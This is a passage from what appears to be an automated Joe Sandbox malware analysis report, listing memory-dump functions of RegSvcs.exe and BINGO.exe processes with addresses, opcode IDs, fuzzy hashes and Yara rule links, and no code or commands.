Instruction Fuzzy Hash: A6212634E087888FCB019B74E89968D7FF2FB42315F1584A6E805DB256EB38C819CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00622AE8 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b4f4a9f376110d2dd046eb32fc08d1dc9c8024874bfe423cb2e130e539970f1
Instruction ID: df940bf5b7cc59dbfb203cf641a1a9baf5694e258584ce170886e8edc20b99e8
Opcode Fuzzy Hash: 7b4f4a9f376110d2dd046eb32fc08d1dc9c8024874bfe423cb2e130e539970f1
Instruction Fuzzy Hash: CB110831B086449FD7115A74AC607AA3BE7DB85346F1144BAD504DB796DB319C098B42

Uniqueness

Uniqueness Score: -1.00%

Function 0017D423 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1170743601.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_17d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89f38bdfbce754da76aa8fb36b3eabb7ccf0f4b63bf231b2c6215a53c1c31f60
Instruction ID: d45532cf375bf1a640e4ddf3716f0694dc45c49204f09736980dc63191098f73
Opcode Fuzzy Hash: 89f38bdfbce754da76aa8fb36b3eabb7ccf0f4b63bf231b2c6215a53c1c31f60
Instruction Fuzzy Hash: 5E11B176504284DFCB12CF14E5C4B16BF71FF94314F24C6A9D8090B616C336D856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00623D68 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7137e3ad54a83ce8fb4f9fbae9eaa1ecfedb0d754550ce3f48d5a633c8c80e52
Instruction ID: 9547cbab32612df8f9aeb3fa8fbc094d48ea5286b615c232fee557dce8ddeba2
Opcode Fuzzy Hash: 7137e3ad54a83ce8fb4f9fbae9eaa1ecfedb0d754550ce3f48d5a633c8c80e52
Instruction Fuzzy Hash: B821C0B1D00669AFCB00CF99D884ADEFBB4FB49314F10852AE918B7200D375A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00623D5C Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6790a86c86e4197f2f6bbb1c43c87530c0963569b23d906218fa9f3f471ed055
Instruction ID: 13fc4d377b111b389b3026c60acee5803f90528935edd3b7e744cbac9c75a7bb
Opcode Fuzzy Hash: 6790a86c86e4197f2f6bbb1c43c87530c0963569b23d906218fa9f3f471ed055
Instruction Fuzzy Hash: 8021C3B1D0161D9FCB10CF99D888ADEFBB4FB49310F50852AE918B7200D374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 001CE777 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1170772547.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1cd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0af59393cb1397e779ce5075db56a3ad03c881cc259077484b4db54276b8d248
Instruction ID: 2607b2018df17828a840ec01a164fde77da154bd9008653f1c91fb591b21110a
Opcode Fuzzy Hash: 0af59393cb1397e779ce5075db56a3ad03c881cc259077484b4db54276b8d248
Instruction Fuzzy Hash: AD119D79904280DFDB01CF14D5C4B15BFA1FB94314F28C6ADD8494B656C33AD85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001CE3EB Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1170772547.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1cd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0af59393cb1397e779ce5075db56a3ad03c881cc259077484b4db54276b8d248
Instruction ID: 3e9dde082200960b2ad18f6a021deb4c71d7b52e19b481517500f001b0585471
Opcode Fuzzy Hash: 0af59393cb1397e779ce5075db56a3ad03c881cc259077484b4db54276b8d248
Instruction Fuzzy Hash: 1D119D75504280DFCB15CF14D5C4B15BFA1FB94324F24C6AED8498B656C33AD85ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 001CE4D3 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1170772547.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1cd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a2b26ae20762a9ea50a49cfd79e9bf448ca15c84b57adc5827f5f39ed1c6cb
Instruction ID: e3bdd37cc7e6a7df03f6c36817fce8b456fa5043d83245c4622928253fceacac
Opcode Fuzzy Hash: a6a2b26ae20762a9ea50a49cfd79e9bf448ca15c84b57adc5827f5f39ed1c6cb
Instruction Fuzzy Hash: 7B11EF79544280CFCB01CF10D5C4B19BFA1FB95318F24C6ADD8494B656C33AD85ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 00622A28 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f03f3d6daf0a512f80d77e8406a3d0cbbaa87305dd28744a3221cc6eb0af8fc
Instruction ID: abf8e6410435e85f053ce906a8eada91eaec428608a38a4b28c164ef6102a85f
Opcode Fuzzy Hash: 2f03f3d6daf0a512f80d77e8406a3d0cbbaa87305dd28744a3221cc6eb0af8fc
Instruction Fuzzy Hash: F6116170F005298F8B81EBB9D85099EB7F6FF8C7507508529E509FB745EB34AD028B92

Uniqueness

Uniqueness Score: -1.00%

Function 00623010 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 720d0b91791c393f95a152f77eb1344b1fe705c1a7a8f08f1a19cfda887d1fc5
Instruction ID: 562ae644d6f34f422746bce8c35a0daf2090bf9149f0f7708089a1eed077c3cf
Opcode Fuzzy Hash: 720d0b91791c393f95a152f77eb1344b1fe705c1a7a8f08f1a19cfda887d1fc5
Instruction Fuzzy Hash: 3A115230F005298F8B81EB79D85499EB7F6EF8C7107508529E109EB745EB349D06CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 00622EF0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3398330e166e92d5371e0baed6a43acc6c0fa5c2fcb93ab990bf41a667d9d42
Instruction ID: dd0110a9b9091c76513e2d908f62f7299105e25ca81a2d5100a796daeaf83621
Opcode Fuzzy Hash: a3398330e166e92d5371e0baed6a43acc6c0fa5c2fcb93ab990bf41a667d9d42
Instruction Fuzzy Hash: B7115E30B005298F8B81EBBDD85099EBBF6FF8C7147504129E119EB345EB34AD028B92

Uniqueness

Uniqueness Score: -1.00%

Function 006218D0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24450d120b54a6d2b8d91773ada17992f6f45213ecc6923d45fa36e47ef2bc3f
Instruction ID: c89eae4673e149c84b8dc2c1d2d357d162bc3021e43ae7e505297d7d26964da2
Opcode Fuzzy Hash: 24450d120b54a6d2b8d91773ada17992f6f45213ecc6923d45fa36e47ef2bc3f
Instruction Fuzzy Hash: A4118230F001698F8B81EF79E81099EB7F6AF882507508125E509EB744EF30AD028BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00622328 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aba145615edc61d426a81a09cd0737ad623575e4a10d6d5970eef49d4363ecd
Instruction ID: b4d83bb92b06f633d6ed5198887284efb0f8a9f5e5fd153ead91f217fc5bfa56
Opcode Fuzzy Hash: 9aba145615edc61d426a81a09cd0737ad623575e4a10d6d5970eef49d4363ecd
Instruction Fuzzy Hash: 90115230B006299F8B81EB79D85099EB7F6EF896107508525E509EB345EF34AD028B91

Uniqueness

Uniqueness Score: -1.00%

Function 006235E0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e79592fdee1afb797650a8ebc811eabd5cf6dc3f3af276a45bc2572b90a22dc
Instruction ID: 6d5fd46229387ad8d73aafb82c7fc423d454884c845e2b954d11a95c3972bc7f
Opcode Fuzzy Hash: 8e79592fdee1afb797650a8ebc811eabd5cf6dc3f3af276a45bc2572b90a22dc
Instruction Fuzzy Hash: 85118230B001698F8B82EF78D81199EB7F6AF886147508135E509EB345EB34AD028B91

Uniqueness

Uniqueness Score: -1.00%

Function 00622DD0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7a64f27678175622074df14b9eb1483ed81bc7ab96ab99f4ff74b8d21d7c77b
Instruction ID: 4a182888b46022cccdaa380b985a3dcd67b97ad82e782faf1e630ff44dc774bd
Opcode Fuzzy Hash: b7a64f27678175622074df14b9eb1483ed81bc7ab96ab99f4ff74b8d21d7c77b
Instruction Fuzzy Hash: 45118E30B001298F8B81EBB8D81099EB7F6AF886107508129E509EB354EF30AD068BD2

Uniqueness

Uniqueness Score: -1.00%

Function 0017D9ED Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1170743601.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_17d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc366932b47eca1601b6966326139c2913a4d51cb012afc181ee369ea5245fbb
Instruction ID: 0380678e0ee2ea0f1924416013c819ebc232f432f291f339204d5ca8c460ee59
Opcode Fuzzy Hash: cc366932b47eca1601b6966326139c2913a4d51cb012afc181ee369ea5245fbb
Instruction Fuzzy Hash: A101D42000C348DADB108A15D884B6BBFB8FF41324F28C01ADD1D5B186C3789800CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0017D9EC Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1170743601.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_17d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5778bdd6359485cc67f8188cd1e7096e2dcec6ec5784af2c94a4e75af23405fc
Instruction ID: a2f824da714bc9dfeb306e8e650d356816fc0f8b4eb66efaf8440317e1c8f072
Opcode Fuzzy Hash: 5778bdd6359485cc67f8188cd1e7096e2dcec6ec5784af2c94a4e75af23405fc
Instruction Fuzzy Hash: 3DF0AF31408248AEEB108A05D884B62FFA8EF42724F28C45AED185B286C3789840CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 006264D0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59b94a1c3cf3649b3203be69bb724407a983094dae1430236338b8451ef38bc8
Instruction ID: 266b3fbc57cd37ab711ed5a66b7db373eadcfa030648ec7831e6529e50ce3962
Opcode Fuzzy Hash: 59b94a1c3cf3649b3203be69bb724407a983094dae1430236338b8451ef38bc8
Instruction Fuzzy Hash: 0CF0F675E001645FCB41E7BC98046EEBFF59F88246F00016AE405E3341EE388A068BD1

Uniqueness

Uniqueness Score: -1.00%

Function 006264E0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43a1334eb8f233659086cec3ee7ca059f25f88136b36b4b8e574c6a17b6ec69e
Instruction ID: 526246bc350e29097966d8d8e67a6b36c9eff9f45053d572ba0f54a6dee860ce
Opcode Fuzzy Hash: 43a1334eb8f233659086cec3ee7ca059f25f88136b36b4b8e574c6a17b6ec69e
Instruction Fuzzy Hash: 2EF0A775F001288F8B40FBBD98086EF7AF5DF88256B000536E509E7340EE388D0287D1

Uniqueness

Uniqueness Score: -1.00%

Function 0062306F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fff7f66402344adfdc7c60326fb006d26201def39a56d1b0e3a9abbd44afdd8
Instruction ID: 407ec05e69ba48c27da37aee04de6179675a3f157a70847465e8dbbe5e1e6464
Opcode Fuzzy Hash: 0fff7f66402344adfdc7c60326fb006d26201def39a56d1b0e3a9abbd44afdd8
Instruction Fuzzy Hash: 96E06D35B000288B8F41EBB9E8648DDB3F6AF8C2247018025E109EB750DF349C01DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00622E2F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6b5c59df9a453547b87462108c859df44ae492e58344165206031483ae82c05
Instruction ID: 51567d98fe11bc333e90f7c6014c3cd2a177be5e214902f574362af882e7547c
Opcode Fuzzy Hash: f6b5c59df9a453547b87462108c859df44ae492e58344165206031483ae82c05
Instruction Fuzzy Hash: BCE09235B000298BCF41EBF9E8608DDB3F2AFCC2287018021E509EB350DF349C029BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0062363F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31da195cbd0f3424228a1fcb2123cea62e67a3dc8df4409a19d39b6840a56f72
Instruction ID: 7259fbdceaf69b65f11fd7a454bff3d5c1daf17fcd9d41fe6b0796662f662fe1
Opcode Fuzzy Hash: 31da195cbd0f3424228a1fcb2123cea62e67a3dc8df4409a19d39b6840a56f72
Instruction Fuzzy Hash: A3E01235B000698FCF42EBB9E8659DDB7F6AFCC2287018065E509EB395DF349C119BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00622A87 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db652d0b4b5e721e42c8fd5a180419f559593b4e5c2dfc2fcb73e03877c52e34
Instruction ID: 34891e8e71a545192327b7cbc4d45b0c04aeda55160c9393d0918e9521ec3922
Opcode Fuzzy Hash: db652d0b4b5e721e42c8fd5a180419f559593b4e5c2dfc2fcb73e03877c52e34
Instruction Fuzzy Hash: 35E06535B000198B8F41E7B9D8609DDB3F2AF882147014020E109E7351DF349C018761

Uniqueness

Uniqueness Score: -1.00%

Function 00622F4F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ae2f950a083f081d27296e51cd8e072ce629793548f0551f6f9980f9f028538
Instruction ID: 3bf13b1eef9f5becc7e4339762da889faf64e2a0a55f627b58ce729c8bdbae76
Opcode Fuzzy Hash: 9ae2f950a083f081d27296e51cd8e072ce629793548f0551f6f9980f9f028538
Instruction Fuzzy Hash: ECE0ED35B000298B8F41EBB9E8659DDB7F6AFCC2247114025E109EB355EF349C119BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0062192F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f14755d39c61d4523d82093c9a690271f01d77bf6d7fc0ce7d4e1d2760a0f6
Instruction ID: 4103e5437b5e57eea4d2386f04ceefee5b7cbb400ddaee2c047f9d77dd59ad74
Opcode Fuzzy Hash: 41f14755d39c61d4523d82093c9a690271f01d77bf6d7fc0ce7d4e1d2760a0f6
Instruction Fuzzy Hash: 59E06D35B000298B8F41EBB9E8608DDB3F6AF882647018021E109EB790DF349C01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00622387 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f10089d7004cb84d209bc78239503be9998350de72b5e95a09ceeeffb2593c42
Instruction ID: 80de1938bbc48b2ede6ad3e15ee0524de4ec97747896af93093fe6f26e34e6eb
Opcode Fuzzy Hash: f10089d7004cb84d209bc78239503be9998350de72b5e95a09ceeeffb2593c42
Instruction Fuzzy Hash: 83E09235B000298BCF41EBB9E8609DDB3F2AFCC2247018021E109EB350DF34AC028BA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: BINGO.exePID: 948, Parent PID: 1860COMMON

Executed Functions

Function 002B0B18 Relevance: 8.1, Strings: 6, Instructions: 570COMMON

Download Yara Rule

Strings

^%, xrefs: 002B1121
^%, xrefs: 002B11DB
^%, xrefs: 002B115C
^%, xrefs: 002B1195
^%, xrefs: 002B121D
^%, xrefs: 002B1256

Memory Dump Source

Source File: 00000004.00000002.945824033.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b0000_BINGO.jbxd

Similarity

API ID:
String ID: ^%$^%$^%$^%$^%$^%
API String ID: 0-3276286719
Opcode ID: 66cf3991b3d9301fcf06b0ebff89d39e31450323012539404fe660515360f5a0
Instruction ID: ac45e5296add601f9c396a0c9417bdcb02aecc992983ae14374c488393335752
Opcode Fuzzy Hash: 66cf3991b3d9301fcf06b0ebff89d39e31450323012539404fe660515360f5a0
Instruction Fuzzy Hash: 9B228F34714302CFC715EF64D8E16AF73A6EB84349F248829C9468B799DB31EC96CB94

Uniqueness

Uniqueness Score: -1.00%

Function 002B04C0 Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

d(fp, xrefs: 002B0631

Memory Dump Source

Source File: 00000004.00000002.945824033.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b0000_BINGO.jbxd

Similarity

API ID:
String ID: d(fp
API String ID: 0-3237745933
Opcode ID: ad0495965fe3dbfcbca88a29b173b238b4001f9882087e6ecfaee007d8ef0e3e
Instruction ID: 80b6f7c23e06b5252d9b3a42d0a5287c04a3b9ea0fb9d09ba385c8e7e679a84e
Opcode Fuzzy Hash: ad0495965fe3dbfcbca88a29b173b238b4001f9882087e6ecfaee007d8ef0e3e
Instruction Fuzzy Hash: A571C235A107059FCB16EFA0D4986AEBBB2BF88344F148519D40767BA4DF70EC99CB40

Uniqueness

Uniqueness Score: -1.00%

Function 002B0A10 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.945824033.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b0000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8326db070d4e27d712f6bd48be5315d703406cd46df084d71adf024e128761d8
Instruction ID: 1c863bd3e09295121f2a72962593417e217122a32ffcd964ba66c08687572967
Opcode Fuzzy Hash: 8326db070d4e27d712f6bd48be5315d703406cd46df084d71adf024e128761d8
Instruction Fuzzy Hash: 952137797446508FC719AB78C898A6D33E2AF4A70971244B8E516CF771EB32DC86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 002B0A20 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.945824033.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b0000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 444da2a67067e4ba9b73af01a5989be3224f805ebf24ea84998d1c5e04a5e6cc
Instruction ID: 2808477e00e9c0a68e59b40182857febee4300342b521f194b8dfe7278ee5f35
Opcode Fuzzy Hash: 444da2a67067e4ba9b73af01a5989be3224f805ebf24ea84998d1c5e04a5e6cc
Instruction Fuzzy Hash: 852125357402508FC759AF78C89896E33E2AF8A71931244B8E506CF771EB32DC86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 002B13D8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.945824033.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b0000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a36c69068e94306e4712316f35858f1744c1f531f4a4b215ac3f7e000b8ec6f
Instruction ID: 2181fc9dc2c04205f3ac6bf2d94efc19c465b50be62b886f0effc139340b3f8a
Opcode Fuzzy Hash: 4a36c69068e94306e4712316f35858f1744c1f531f4a4b215ac3f7e000b8ec6f
Instruction Fuzzy Hash: 21015E76E102059FCB40EFA4D8848EFFBB9FF89310B108666E515E7221EB31E915CB90

Uniqueness

Uniqueness Score: -1.00%

Function 002B077C Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.945824033.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b0000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49310fcedd1d594a685cdaef247bbdc3265e6bde856de211402ec8db66c1073b
Instruction ID: a39a29b8eefbe0f76679d20766c0f60d062b8c2ec088bfc70f6177337767f497
Opcode Fuzzy Hash: 49310fcedd1d594a685cdaef247bbdc3265e6bde856de211402ec8db66c1073b
Instruction Fuzzy Hash: DCF05870A10301CBEB119FA0D1887AEBBB0AB48358F200898D002A72A1CB749C84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002B0479 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.945824033.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b0000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db2555806ee3afcb7e9a075404f71c0b11063f0c5a8e3af9b3ac919670139c2
Instruction ID: 3e2f9ba136f95a052cec63c41beb21c3a93b9a1e3af258de5335c2fff5dc5f0d
Opcode Fuzzy Hash: 3db2555806ee3afcb7e9a075404f71c0b11063f0c5a8e3af9b3ac919670139c2
Instruction Fuzzy Hash: ADE0DFB6D092549FCB40EFB8AC441EEBFF0AE09244B2105AAC84AE3202E2708710CFC1

Uniqueness

Uniqueness Score: -1.00%

Function 002B12A8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.945824033.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b0000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aba675f802f29db533acad318fa8150a6ef49a7143fe5963c8f60d18300f45cb
Instruction ID: 08c08120eb784024a174c87427d65e911516d04cd6ca31fa688c902622d7bde0
Opcode Fuzzy Hash: aba675f802f29db533acad318fa8150a6ef49a7143fe5963c8f60d18300f45cb
Instruction Fuzzy Hash: 51D012357102249FC710EF65E959A863B78AB05751F504095E908CB250DB71DD148791

Uniqueness

Uniqueness Score: -1.00%

Function 002B0488 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.945824033.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b0000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2026ccbe4b8a748a828e0d983c4146bf520fb4b7d73344ef005546f3182ab75
Instruction ID: 1398e3b41ffa656c0bd7aa1fc8cd5b22cb320fc8f8f144a7465aa5cc347504b2
Opcode Fuzzy Hash: f2026ccbe4b8a748a828e0d983c4146bf520fb4b7d73344ef005546f3182ab75
Instruction Fuzzy Hash: FED017B1D002299F8B40EFB8A9091EEBBF8EA09250B100466DA09E3200E2704A208BD1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: BINGO.exePID: 2992, Parent PID: 1860COMMON

Executed Functions

Function 003804C0 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

d(Zp, xrefs: 00380631

Memory Dump Source

Source File: 00000006.00000002.961086670.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_380000_BINGO.jbxd

Similarity

API ID:
String ID: d(Zp
API String ID: 0-3004132594
Opcode ID: c510c56062c7746af1261ee8e64f528c1c182597c8ff035ba76df7ed50ecc676
Instruction ID: 2e1b23e0b8b7a10adce6668eb199beb6c89929c308c19d7c9e00f200bd782139
Opcode Fuzzy Hash: c510c56062c7746af1261ee8e64f528c1c182597c8ff035ba76df7ed50ecc676
Instruction Fuzzy Hash: F2819035A007049FCB1AEFA0D80869EBBA2FF89300F158569D506A7B64DF75EC99CB40

Uniqueness

